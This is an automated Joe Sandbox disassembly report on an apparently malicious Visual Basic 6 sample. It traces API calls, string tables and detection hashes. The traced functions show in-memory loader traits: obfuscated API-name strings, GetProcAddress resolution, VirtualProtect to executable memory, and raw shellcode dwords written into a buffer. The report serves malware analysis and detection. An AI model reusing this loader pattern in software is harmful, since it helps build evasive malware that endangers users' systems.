__vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000), ref: 004FD22F
#644.MSVBVM60(00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C), ref: 004FD235
#644.MSVBVM60(00000000,00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000), ref: 004FD23E
__vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000), ref: 004FD24C
__vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004FD28E

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Move$#644$ErrorFreeSystem$List
String ID:
API String ID: 3381585117-0
Opcode ID: b23108fc929bcb6527bdb69678a65547a6f1ef07f370f7d08a42e16d6feb8e7f
Instruction ID: cc6ea91582036697d6a25cbd10eb72af74331e746556e9a3f15e669c3dd57453
Opcode Fuzzy Hash: b23108fc929bcb6527bdb69678a65547a6f1ef07f370f7d08a42e16d6feb8e7f
Instruction Fuzzy Hash: 8962AE75D001096ADB19FBE1CC82DEF767CAF19344B14423FB611BA2E6EE385905C6E8

Function 004F9F8B Relevance: 201.9, APIs: 111, Strings: 4, Instructions: 687
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaStrCat.MSVBVM60(0040B650,0040B648), ref: 004FA013
__vbaStrMove.MSVBVM60(0040B650,0040B648), ref: 004FA01D
__vbaStrCat.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA028
__vbaStrMove.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA032
__vbaStrCat.MSVBVM60(0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA03D

Part of subcall function 004FFB2A: __vbaVarVargNofree.MSVBVM60 ref: 004FFB60
Part of subcall function 004FFB2A: __vbaStrVarVal.MSVBVM60(00000000,00000000), ref: 004FFB6A
Part of subcall function 004FFB2A: #644.MSVBVM60(00000000,00000000,00000000), ref: 004FFB70
Part of subcall function 004FFB2A: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000), ref: 004FFB7B

GetModuleHandleW.KERNEL32(00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA055
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA069
__vbaFreeVar.MSVBVM60 ref: 004FA074

Part of subcall function 004FDB76: __vbaVarDup.MSVBVM60(?,?,00000000), ref: 004FDBB9
Part of subcall function 004FDB76: __vbaLenVar.MSVBVM60(?,?,?,?,00000000), ref: 004FDBC6
Part of subcall function 004FDB76: __vbaI4Var.MSVBVM60(00000000,?,?,?,?,00000000), ref: 004FDBCC
Part of subcall function 004FDB76: __vbaStrVarVal.MSVBVM60(?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDBFA
Part of subcall function 004FDB76: #631.MSVBVM60(00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC00
Part of subcall function 004FDB76: __vbaVarCat.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC1B
Part of subcall function 004FDB76: __vbaVarMove.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC25
Part of subcall function 004FDB76: __vbaFreeStr.MSVBVM60(?,?,?,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 004FDC2D
Part of subcall function 004FDB76: __vbaFreeVarList.MSVBVM60(00000002,?,00000008,?,?,?,00000000,?,?,?,?,00000000,?,?,?,?), ref: 004FDC3B
Part of subcall function 004FDB76: __vbaFreeVar.MSVBVM60(004FDC87,00000000,?,?,?,?,00000000), ref: 004FDC81

__vbaStrVarVal.MSVBVM60(?,?,?), ref: 004FA0A6
__vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 004FA0B0
GetProcAddress.KERNEL32(00000000,?), ref: 004FA0BC
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 004FA0D0
__vbaFreeVar.MSVBVM60(?,?,?), ref: 004FA0DB
__vbaStrCat.MSVBVM60(0040BCD0,0040BCC8,?,?,?), ref: 004FA0EB
__vbaStrMove.MSVBVM60(0040BCD0,0040BCC8,?,?,?), ref: 004FA0F5
__vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA101
__vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA10B
__vbaStrCat.MSVBVM60(0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA116
__vbaStrMove.MSVBVM60(0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA120
__vbaStrCat.MSVBVM60(0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA127
__vbaStrMove.MSVBVM60(0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA131
__vbaStrCat.MSVBVM60(0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA13C
__vbaStrMove.MSVBVM60(0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA146
__vbaStrCat.MSVBVM60(0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA151
__vbaStrMove.MSVBVM60(0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA15B
__vbaStrCat.MSVBVM60(0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA166
__vbaStrMove.MSVBVM60(0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA170
#644.MSVBVM60(00000000,0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?), ref: 004FA176
GetModuleHandleW.KERNEL32(00000000,00000000,0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8), ref: 004FA17C
__vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?,00000000,00000000,0040BCF8,00000000,0040BCF0,00000000,0040BCE8,00000000), ref: 004FA1A4
__vbaStrCat.MSVBVM60(0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1B6
__vbaStrMove.MSVBVM60(0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1C0
__vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1C7
__vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?,?), ref: 004FA1D1
__vbaStrCat.MSVBVM60(0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA1DD
__vbaStrMove.MSVBVM60(0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8,?,?), ref: 004FA1E7
__vbaStrCat.MSVBVM60(0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8), ref: 004FA1F2
__vbaStrMove.MSVBVM60(0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000,0040BCD0,0040BCC8), ref: 004FA1FC
__vbaStrCat.MSVBVM60(0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000), ref: 004FA207
__vbaStrMove.MSVBVM60(0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000,0040BCD8,00000000), ref: 004FA211
__vbaStrCat.MSVBVM60(0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000), ref: 004FA21C
__vbaStrMove.MSVBVM60(0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000,0040BCE0,00000000), ref: 004FA226
__vbaStrCat.MSVBVM60(0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000), ref: 004FA231
__vbaStrMove.MSVBVM60(0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00,0040BCD0,00000000), ref: 004FA23B
__vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00), ref: 004FA242
__vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000,0040BD08,0040BD00), ref: 004FA24C
__vbaStrCat.MSVBVM60(0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000), ref: 004FA257
__vbaStrMove.MSVBVM60(0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000,0040BCD8,00000000), ref: 004FA261
__vbaStrCat.MSVBVM60(0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000), ref: 004FA268
__vbaStrMove.MSVBVM60(0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000,0040BD10,00000000), ref: 004FA272
__vbaStrCat.MSVBVM60(0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000), ref: 004FA27D
__vbaStrMove.MSVBVM60(0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000,0040BD18,00000000), ref: 004FA287
__vbaStrCat.MSVBVM60(0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000), ref: 004FA292
__vbaStrMove.MSVBVM60(0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000), ref: 004FA29C
__vbaStrCat.MSVBVM60(0040BD10,00000000,0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000), ref: 004FA2A3
__vbaStrMove.MSVBVM60(0040BD10,00000000,0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000), ref: 004FA2AD
__vbaStrToAnsi.MSVBVM60(?,00000000,0040BD10,00000000,0040BD38,00000000,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000), ref: 004FA2B7
GetProcAddress.KERNEL32(00000000,?), ref: 004FA2C3
__vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA307
__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,0000000E,?,?,?,?,?,?,?,?), ref: 004FA321
__vbaNew.MSVBVM60(0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000,0040BD20,00000000), ref: 004FA333
__vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8,00000000), ref: 004FA33D
__vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8), ref: 004FA343
__vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28), ref: 004FA34D
__vbaObjSetAddref.MSVBVM60(00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000), ref: 004FA359
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30), ref: 004FA368
__vbaObjSetAddref.MSVBVM60(?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000,0040BCE8), ref: 004FA37B
#644.MSVBVM60(00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000), ref: 004FA381
__vbaFreeObj.MSVBVM60(00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28,00000000), ref: 004FA38C
#644.MSVBVM60(?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30,00000000,0040BCD8,00000000,0040BD28), ref: 004FA395
__vbaAryLock.MSVBVM60(?,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000), ref: 004FA3C1
#644.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10), ref: 004FA3D6
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000), ref: 004FA3E5
__vbaObjSetAddref.MSVBVM60(?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000), ref: 004FA418
#644.MSVBVM60(00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10), ref: 004FA41E
__vbaFreeObj.MSVBVM60(00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10), ref: 004FA429
#644.MSVBVM60(005032CC,00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000), ref: 004FA437
__vbaAryLock.MSVBVM60(?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?,00000000,?,005032D0), ref: 004FA453
#644.MSVBVM60(?,?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?,00000000,?), ref: 004FA467
__vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?,00000000), ref: 004FA476
#644.MSVBVM60(?,?,?,?,?,00000000,?,00000004,005032CC,00000000,?,005032D0,?,?,00000000,?), ref: 004FA48E
__vbaRedim.MSVBVM60(00000080,00000004,00503214,00000003,00000001,00000010,00000000,00000000,?,?,?,?,?,?,00000000,?), ref: 004FA4BF
#644.MSVBVM60(?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000,0040BD10,00000000,0040BD30), ref: 004FA4CB
#644.MSVBVM60(?,-0000000C,00000000,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C,0040BD6C,0040BCD0,00000000), ref: 004FA4F0
__vbaAryLock.MSVBVM60(?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?,00000000,?,005032D0,00000000,0040BD5C), ref: 004FA51B
__vbaStrCat.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?,00000000), ref: 004FA549
__vbaStrMove.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?,00000000), ref: 004FA553
__vbaI4Str.MSVBVM60(00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?,00000000,?), ref: 004FA559
VirtualProtect.KERNELBASE(005032D0,00000000,00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,?,?,?), ref: 004FA566
__vbaHresultCheckObj.MSVBVM60(00000000,005032D0,0040BD6C,0000002C), ref: 004FA57F
__vbaAryUnlock.MSVBVM60(?), ref: 004FA588
__vbaFreeStr.MSVBVM60(?), ref: 004FA590
#644.MSVBVM60(?,?), ref: 004FA599
__vbaAryLock.MSVBVM60(?,00000000,-0000000C,?,?), ref: 004FA5D4
#644.MSVBVM60(?,?,00000000,-0000000C,?,?), ref: 004FA5E9
__vbaAryUnlock.MSVBVM60(?,?,?,00000000,-0000000C,?,?), ref: 004FA5F8
#644.MSVBVM60(00000040,00000000,-0000000C,?,?), ref: 004FA62C
#644.MSVBVM60(0424448B,?,00000000,00000004,00000040,00000000,-0000000C,?,?), ref: 004FA656
#644.MSVBVM60(408B008B,?,00000000,00000004,0424448B,?,00000000,00000004,00000040,00000000,-0000000C,?,?), ref: 004FA680
#644.MSVBVM60(20C4832C,?,00000000,00000004,408B008B,?,00000000,00000004,0424448B,?,00000000,00000004,00000040,00000000,-0000000C,?), ref: 004FA6AA
#644.MSVBVM60(E02474FF,?,00000000,00000004,20C4832C,?,00000000,00000004,408B008B,?,00000000,00000004,0424448B,?,00000000,00000004), ref: 004FA6D4
VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000040,?,?,00000000,00000004,E02474FF,?,00000000), ref: 004FA729
__vbaHresultCheckObj.MSVBVM60(00000000,005032D0,0040BD6C,00000020), ref: 004FA742
__vbaAryLock.MSVBVM60(?), ref: 004FA766
#644.MSVBVM60(?,?), ref: 004FA77A
__vbaAryUnlock.MSVBVM60(?,?,?), ref: 004FA789
#644.MSVBVM60(005032CC), ref: 004FA7AE
#644.MSVBVM60(00000000,?,005032CC), ref: 004FA7C8
#644.MSVBVM60(-00000004,00000000,00000000,?,005032CC), ref: 004FA7E2
__vbaFreeVar.MSVBVM60(?,-00000004,00000000,-00000004,00000000,00000000,?,005032CC), ref: 004FA802
__vbaAryDestruct.MSVBVM60(00000000,?,004FA87D,?,-00000004,00000000,-00000004,00000000,00000000,?,005032CC), ref: 004FA877

Strings

DqlqlqFquqnqcqtqiqoqnqCqaqlqlq, xrefs: 004FA08A
@, xrefs: 004FA4E5
bvm, xrefs: 004FA023
!P, xrefs: 004F9FAF

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Move$#644$Free$List$LockUnlock$Addref$AddressAnsiCheckHandleHresultModuleProcProtectRedimVirtual$#631CastDestructNofreeVarg
String ID: @$DqlqlqFquqnqcqtqiqoqnqCqaqlqlq$bvm$!P
API String ID: 3865120960-76275332
Opcode ID: 1332d6ac0325587f3455eac6534a5f05f5ba20c1d3d93ede3bf419cd7a12755c
Instruction ID: f61d177eecce2a4a06c9100171e70ccd984d061c79a0d37182c70c6426ca81cd
Opcode Fuzzy Hash: 1332d6ac0325587f3455eac6534a5f05f5ba20c1d3d93ede3bf419cd7a12755c
Instruction Fuzzy Hash: 3242DFB1D00118AADB15EFA5CC85EDEB7BCEF18304F14416EF505FB2A1DA389A05CB68

Function 004FB547 Relevance: 150.8, APIs: 100, Instructions: 833
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5AE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB5D8
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5F7
__vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB613
__vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB61D
__vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 004FB62A
__vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 004FB632
__vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 004FB63A
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 004FB642
__vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 004FB64E
__vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB66A
__vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB674
__vbaStrCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB681
__vbaFreeStr.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB689
__vbaFreeObj.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB691
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB699
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB6C9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB6F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB71E
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB72A
__vbaStrMove.MSVBVM60(00000000,?,?), ref: 004FB73A
__vbaStrCopy.MSVBVM60(00000000,?,?), ref: 004FB744
__vbaFreeStr.MSVBVM60(00000000,?,?), ref: 004FB74C
__vbaFreeObj.MSVBVM60(00000000,?,?), ref: 004FB754
__vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 004FB760
__vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB770
__vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB77A
__vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB782
__vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?), ref: 004FB78A
__vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?,00000000,?,?), ref: 004FB796
__vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7A6
__vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7B0
__vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7B8
__vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 004FB7C0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB7E5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB80A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB835
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB85A
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004FB875
__vbaAryLock.MSVBVM60(?,?), ref: 004FB884
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB8B2
__vbaAryUnlock.MSVBVM60(?), ref: 004FB8BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB930
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004FB959
__vbaAryLock.MSVBVM60(?,?), ref: 004FB968
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB994
__vbaAryUnlock.MSVBVM60(?), ref: 004FB99D
__vbaAryLock.MSVBVM60(?,?,?), ref: 004FB9F3
#644.MSVBVM60(?,?,?,?), ref: 004FBA02
__vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 004FBA0E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?), ref: 004FBA36
__vbaAryLock.MSVBVM60(?,?), ref: 004FBA42
#644.MSVBVM60(?,?,?), ref: 004FBA51
__vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 004FBA5D
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?), ref: 004FBA85
__vbaRedim.MSVBVM60(00000000,00000014,?,0040B518,00000001,0000007F,00000000,?,00000000,?,?,?,?,?,?,?), ref: 004FBAA8
__vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,?,?,?,?,?), ref: 004FBAD2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBB19
#698.MSVBVM60(?,00000020), ref: 004FBB24
#607.MSVBVM60(?,?,?,?,00000020), ref: 004FBB3A
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB43
__vbaStrMove.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB4D
__vbaStrCopy.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB56
__vbaFreeStr.MSVBVM60(?,?,?,?,?,00000020), ref: 004FBB5E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000020), ref: 004FBB6D
#644.MSVBVM60(?,?,?,00000020), ref: 004FBB77
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBB9F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBBC4
